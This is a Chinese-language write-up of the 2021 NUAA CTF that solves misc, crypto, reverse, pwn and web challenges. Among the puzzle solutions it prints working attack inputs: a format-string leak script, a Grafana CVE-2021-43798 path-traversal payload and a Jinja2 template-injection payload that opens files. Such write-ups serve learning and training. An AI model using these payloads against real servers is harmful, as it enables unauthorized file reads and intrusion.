2021NUAA-wp

时间有点紧,有几题差一点

签到

腾讯会议
flag{we1c0m_t0_asur!ctf}

misc

baby_mix

伪加密,09改成00
图片上边左边看到白条,应该是lsb
stegsolve查看得到二维码

扫码得到

1
4a5a4a584732544748424658515654514f4634575135435447564a4749564a5347463455595754564f464c444f5752594f56465751334b55474a345841324b494b4a3546495533594b524a4449524b454b35435753334c324f4a41564153534f48424756515243574d355a464d3543474a593d3d3d3d3d3d

十六进制转字符串

1
JZJXG2TGHBFXQVTQOF4WQ5CTGVJGIVJSGF4UYWTVOFLDOWRYOVFWQ3KUGJ4XA2KIKJ5FIU3YKRJDIRKEK5CWS3L2OJAVASSOHBGVQRCWM5ZFM5CGJY======

base32

1
NSsjf8KxVpqyhtS5RdU21yLZuqV7Z8uKhmT2ypiHRzTSxTR4EDWEimzrAPJN8MXDVgrVtFN

base58

1
YXN1cml7aV90aGlua190aGF0X2lzX3NvX2Vhc3lfZm9yX3lvdX0=

base64

1
asuri{i_think_that_is_so_easy_for_you}

medium

解压有个key.wav文件,应该是密钥
audacity频谱看一下,得到密钥MudaMudaMudaMuda

strings看下图片,发现结尾有一串字符串

1
RjAgOUYgOTkgODMgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEUgQTQgRjAgOUYgOUEgQUEgRjAgOUYgOEMgOEYgRjAgOUYgOTAgOEUgRjAgOUYgQTUgOEIgRjAgOUYgOUEgQUIgRjAgOUYgOTggODYgRTIgOUMgODUgRjAgOUYgOTggODAgRjAgOUYgQTQgQTMgRTIgOEMgQTggRjAgOUYgOTAgOEQgRTIgOTggODAgRjAgOUYgQTUgOEIgRjAgOUYgOTggODYgRjAgOUYgOTkgODMgRjAgOUYgOEUgODMgRjAgOUYgOTAgOTggRjAgOUYgOEQgOEQgRTIgOTggODIgRjAgOUYgOUEgQUEgRjAgOUYgOEMgQUEgRjAgOUYgOTIgQjUgRjAgOUYgOUEgQTggRTIgOEMgQTggRjAgOUYgOTggODEgRjAgOUYgOTQgQUEgRTIgOUMgOTYgRjAgOUYgOEUgODggRjAgOUYgOEMgOEYgRjAgOUYgOTQgODQgRjAgOUYgOTYgOTAgRjAgOUYgQTYgOTMgRjAgOUYgOEMgOEYgRjAgOUYgOTUgQjkgRjAgOUYgOTggOEQgRjAgOUYgOTEgOEMgRjAgOUYgOEMgODkgRjAgOUYgOTIgQjUgRjAgOUYgOEYgOEUgRjAgOUYgOUEgQUIgRjAgOUYgQTQgQTMgRjAgOUYgOTYgOTAgRjAgOUYgOTIgQTcgRjAgOUYgOEQgOEQgRjAgOUYgOEMgQkYgRjAgOUYgOTggOEQgRjAgOUYgOEQgOEUgRjAgOUYgOUEgQTggRjAgOUYgOTAgOEUgRjAgOUYgOTIgQjUgRjAgOUYgOEMgQkYgRjAgOUYgOEYgQjkgRjAgOUYgOEUgODUgRjAgOUYgOTkgODMgRjAgOUYgOTEgOTEgRjAgOUYgOTggODYgRTIgOTggODMgRjAgOUYgOTAgODUgRjAgOUYgOTUgQjkgRjAgOUYgOTggODcgRjAgOUYgOEYgQjkgRjAgOUYgOEYgQjkgRjAgOUYgOEQgQjUgRjAgOUYgOEUgODggRjAgOUYgOEQgOEUgRjAgOUYgQTQgQTMgRjAgOUYgOTggODEgRjAgOUYgOEQgOEQgRjAgOUYgOUEgQTggRjAgOUYgOEYgQjkgRjAgOUYgOTEgQTMgRjAgOUYgOTQgODQgRjAgOUYgQTQgQTMgRjAgOUYgOEUgODggRjAgOUYgOTggODIgRjAgOUYgOTAgOEQgRTIgOUMgODUgRjAgOUYgOTggODAgIEUyIDlDIDg1IEYwIDlGIDlBIEFBIEYwIDlGIDk4IDhFIEYwIDlGIDk4IDgwIEYwIDlGIDk3IDkyIEYwIDlGIDk3IDkyCg==

base64

1
F0 9F 99 83 F0 9F 92 B5 F0 9F 8C BF F0 9F 8E A4 F0 9F 9A AA F0 9F 8C 8F F0 9F 90 8E F0 9F A5 8B F0 9F 9A AB F0 9F 98 86 E2 9C 85 F0 9F 98 80 F0 9F A4 A3 E2 8C A8 F0 9F 90 8D E2 98 80 F0 9F A5 8B F0 9F 98 86 F0 9F 99 83 F0 9F 8E 83 F0 9F 90 98 F0 9F 8D 8D E2 98 82 F0 9F 9A AA F0 9F 8C AA F0 9F 92 B5 F0 9F 9A A8 E2 8C A8 F0 9F 98 81 F0 9F 94 AA E2 9C 96 F0 9F 8E 88 F0 9F 8C 8F F0 9F 94 84 F0 9F 96 90 F0 9F A6 93 F0 9F 8C 8F F0 9F 95 B9 F0 9F 98 8D F0 9F 91 8C F0 9F 8C 89 F0 9F 92 B5 F0 9F 8F 8E F0 9F 9A AB F0 9F A4 A3 F0 9F 96 90 F0 9F 92 A7 F0 9F 8D 8D F0 9F 8C BF F0 9F 98 8D F0 9F 8D 8E F0 9F 9A A8 F0 9F 90 8E F0 9F 92 B5 F0 9F 8C BF F0 9F 8F B9 F0 9F 8E 85 F0 9F 99 83 F0 9F 91 91 F0 9F 98 86 E2 98 83 F0 9F 90 85 F0 9F 95 B9 F0 9F 98 87 F0 9F 8F B9 F0 9F 8F B9 F0 9F 8D B5 F0 9F 8E 88 F0 9F 8D 8E F0 9F A4 A3 F0 9F 98 81 F0 9F 8D 8D F0 9F 9A A8 F0 9F 8F B9 F0 9F 91 A3 F0 9F 94 84 F0 9F A4 A3 F0 9F 8E 88 F0 9F 98 82 F0 9F 90 8D E2 9C 85 F0 9F 98 80  E2 9C 85 F0 9F 9A AA F0 9F 98 8E F0 9F 98 80 F0 9F 97 92 F0 9F 97 92

hex转字符

1
🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅😀🤣⌨🐍☀🥋😆🙃🎃🐘🍍☂🚪🌪💵🚨⌨😁🔪✖🎈🌏🔄🖐🦓🌏🕹😍👌🌉💵🏎🚫🤣🖐💧🍍🌿😍🍎🚨🐎💵🌿🏹🎅🙃👑😆☃🐅🕹😇🏹🏹🍵🎈🍎🤣😁🍍🚨🏹👣🔄🤣🎈😂🐍✅😀✅🚪😎😀🗒🗒

emoji-aes,加上密钥
解出:flag{AES_1s_Gr3atS0_y0u_L1ke_1t_V3ry_Much}

questionnaire

问卷调查,答案分别为

1
2
3
4
5
6
7
Naijing University of Aeronautics and Astronautics
都缺
Asuri
航空航天民航
智周万物,道济天下
辅导员审核
将军路校区

asuri{baigei_h4ve_funnnn}

我们生活在南京(一)——穿越时空的电波

audacity反转音频,会听到一些英语单词,根据无线电英语字母发音表来写

RADIOWAVESACROSSTIME

Try2FindMe

比赛的时候用剑龙一直报错,加上快结束了,就没往下看
结束后看了wp才知道是magic number的问题
赛后复现:

下载得到一个压缩包,binwalk分离出一个压缩包,解压得到一个pyc文件
反编译pyc文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from Crypto.Cipher import AES
import binascii

def decrypt(x, cipher):
    key = x + 'n0lve3t6r1s'

    try:
        aes = AES.new(key.rjust(24, 'A'), AES.MODE_ECB)
        cipher = binascii.unhexlify(cipher)
        flag = aes.decrypt(cipher).decode()
        return flag
        return ''
        return None



def main():
    c = '29426dfee9b0f158983ad996b0b7a25e3fdf85c3df187b697e3b639c64f452f21c95a941542aa530199083baf296d805'
    k = input('Please input your key: ')
    flag = decrypt(k, c)
    if 'flag' in flag:
        print('Wow, you find it!!!')
    else:
        print('Oh no!!!')

if __name__ == '__main__':
    main()

一个AES加密,但是少了13位密钥

题目给出的hint:pyc 隐写 python 3.7.11
pyc隐写,先在github上下载剑龙

但是剑龙有几个坑要注意:
1:要用python3.6运行脚本
2:python3.6以下magic number是12个字节;python3.7以上是16个字节

因为github上下载的脚本默认是使用12个字节解密,但是题目中是python3.7的环境,所以当时一直报错
我们需要将脚本中第123行的header = f.read(12)改为header = f.read(16)

运行脚本,得到缺少的密钥k5fgb2eur5sty

但是在脚本中解密AES是失败的,出题人给出的解释是最后的 AES 跑不出来可能是 python 依赖版本不一样导致锅了,问题不大,找个在线的 AES 解密就行

crypto

checkin

简单写个脚本

1
2
3
4
5
6
7
8
9
10
d='oclz{loovyd_vb_l_bvnucd_hqpumj}'
e=''
for i in d:
    if i  in "{}":
        continue
    for j in range(26):
            if ((j*11)%26)==(ord(i)-97):
                    e=e+chr(96+j)
                    print(e)
                    break


最后结果加上下划线

easyRSA

先提取c1、c2

1
2
3
4
c2 = int(open('flag.enc2', 'rb').read().hex(), 16)
c1 = int(open('flag.enc1', 'rb').read().hex(), 16)
print(c1)
print(c2)

共模攻击脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from libnum import n2s,s2n
from gmpy2 import invert
def egcd(a, b):
  if a == 0:
    return (b, 0, 1)
  else:
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)
def main():
  n = 0x00b0bee5e3e9e5a7e8d00b493355c618fc8c7d7d03b82e409951c182f398dee3104580e7ba70d383ae5311475656e8a964d380cb157f48c951adfa65db0b122ca40e42fa709189b719a4f0d746e2f6069baf11cebd650f14b93c977352fd13b1eea6d6e1da775502abff89d3a8b3615fd0db49b88a976bc20568489284e181f6f11e270891c8ef80017bad238e363039a458470f1749101bc29949d3a4f4038d463938851579c7525a69984f15b5667f34209b70eb261136947fa123e549dfff00601883afd936fe411e006e4e93d1a00b0fea541bbfc8c5186cb6220503a94b2413110d640c77ea54ba3220fc8f4cc6ce77151e29b3e06578c478bd1bebe04589ef9a197f6f806db8b3ecd826cad24f5324ccdec6e8fead2c2150068602c8dcdc59402ccac9424b790048ccdd9327068095efa010b7f196c74ba8c37b128f9e1411751633f78b7b9e56f71f77a1b4daad3fc54b5e7ef935d9a72fb176759765522b4bbc02e314d5c06b64d5054b7b096c601236e6ccf45b5e611c805d335dbab0c35d226cc208d8ce4736ba39a0354426fae006c7fe52d5267dcfb9c3884f51fddfdf4a9794bcfe0e1557113749e6c8ef421dba263aff68739ce00ed80fd0022ef92d3488f76deb62bdef7bea6026f22a1d25aa2a92d124414a8021fe0c174b9803e6bb5fad75e186a946a17280770f1243f4387446ccceb2222a965cc30b3929L
  c1 = 409050138400231971554294088177137255457866075540394361465618420085942037334914972271553348781734546381272987423855027216175678797436131073306888763180501523905135583905144901381224572922542735812959826069495112995911282269377230245515683164143316763758642080370867274365360647518283349684822272605576874844625387807047876206532634507258565110299247417968586498427727688356287596783690957837504438650897148190345700044861267114786057049491164836631033845216983588558199652913012590435836646957168387808248342739079479547784004511726635639407815336376908051269831834833967007931321906512831272657668494512124731674031937509111585885992978363095964860952405173714000880231608814695517820595229454266690556749667796735461828114590568954658520700475934939183919597602772428393159957171678913035977611490511885932486154785287709132255326686398261542844030065556598666191350007752712425713619749771672365637485154754564779267050928584728661807027994863116745339833084769533981399300503220638563466169390183736267153617583845250415885823024980144631079997094009230377992595577328633292390530018606442243369688905175147209020920954422003555782869268678894916106413862664953146515732785804502660407314901808581405034432308726147933849979689989
  c2 = 660786051824910230873884600744959030265388429192727951166721113879854464522389325739802703310913732902833778034401632628938144275110259033918655077691853918758634982899427693594671785857857909036915654998761013827868199342737749405352507276436866364180154665315956829382533710951839019853169966694154970158966072113917267296101513243808003273019100867933714599898053661451818477001562112853209154906322205083636027498233807131522283087979547271774312067398759611022191882371123084261761098923994873110788704960182273817371315264655632343946622563006808101322364265578490109714246148052618988958628592753911496921563155003551926547472410642201974274781280633708636309449501619866376422440041537758514811836133804597783256003504933767151921016752120604258580059668650713822253122650687275054081288622996628277268146723350191531420962242602380839728712825405572549099787290957348706683963946075215806340393267714297975946671488782713260980129229158285210722045502442378445134853897763065681974592818004420357542042894544487694477937617156099760573978759048442186633017206146993595028297257148566673402976005517349438948032707348011387517929999285636559431700923275025083662201127580201286747957827301089492530820945594666308738557238429
  e1 = 17
  e2 = 65537
  s = egcd(e1, e2)
  s1 = s[1]
  s2 = s[2]
  if s1<0:
    s1 = - s1
    c1 = invert(c1, n)
  elif s2<0:
    s2 = - s2
    c2 = invert(c2, n)
  m = pow(c1,s1,n)*pow(c2,s2,n) % n
  print n2s(m)
if __name__ == '__main__':
  main()

reverse

IDA Start

ida64打开,shift+F12

flag{St4rt_t0_u3e_IDA}

Warm up

IDA分析
main函数里面有异或

然后main函数中先使用某个函数调用了另一个函数

这个函数中也存在异或

脚本解密

1
2
3
4
5
6
7
8
9
10
11
key=[ 0x56, 0x4E, 0x57, 0x58, 0x51, 0x51, 0x09, 0x46, 0x17, 0x46,0x54, 0x5A, 0x59, 0x59, 0x1F, 0x48, 0x32, 0x5B, 0x6B, 0x7C,0x75, 0x6E, 0x7E, 0x6E, 0x2F, 0x77, 0x4F, 0x7A, 0x71, 0x43,0x2B, 0x26, 0x89, 0xFE]
str="qasxcytgsasxcvrefghnrfghnjedfgbhn\x00"
print(len(str))
str2=[0]*34
for i in range(0,34):
    str2[i]=key[i]^(2*i+65)
flag=''
print(str2)
for i in range(34):
    flag+=chr(str2[i]^ord(str[i]))
print(flag)

pwn

format

通过分析发现flag 放在buf指向的地址处

获取format的偏移 然后计算出buf的偏移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
import time
n=1
while 1:
	try:
		p=process('format')
		p.sendline('aaaa%'+str(n)+'$p')
		p.readuntil('aaaa')
		d=p.read()
		if '61616161' in d:
			print(n,d)
			break
		print(d)
	except:
		pass
	n=n+1


使用%7$s获取buf指向的地址处储存的数据

1
2
3
4
5
6
from pwn import *
import time
n=8
p=remote("118.195.147.196",9185)
p.sendline("%7$s")
p.interactive()

thread

顶级非预期
1111111111131111111311121131114瞎按
录了视频

web

真的签到

百度到CVE-2021-43798
payload:/public/plugins/welcome/../../../../../../../../home/grafana/flag

baby_python

前端应该做处理了看不见回显,使用BurpSuite

传入{{self}},返回模板数据

常规了self.__class__.__base__.__subclasses__()

查看type类的初始化方法,传入{{self.__class__.__base__.__subclasses__()[0].__init__}}

后面就是常规payload了,跑一下ls有文件名就直接获取了

1
?name={{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('flllll11111114aaaaaggggggggggggg').read()}}

参考文章

Twister

F12看到一个文件f111444g.php

访问,请求头里直接就是flag

wp
#wp #nuaa #2021
2021NUAA-wp
https://www.dr0n.top/posts/3470e8c1/
作者
dr0n
发布于
2021年12月11日
更新于
2024年3月21日
许可协议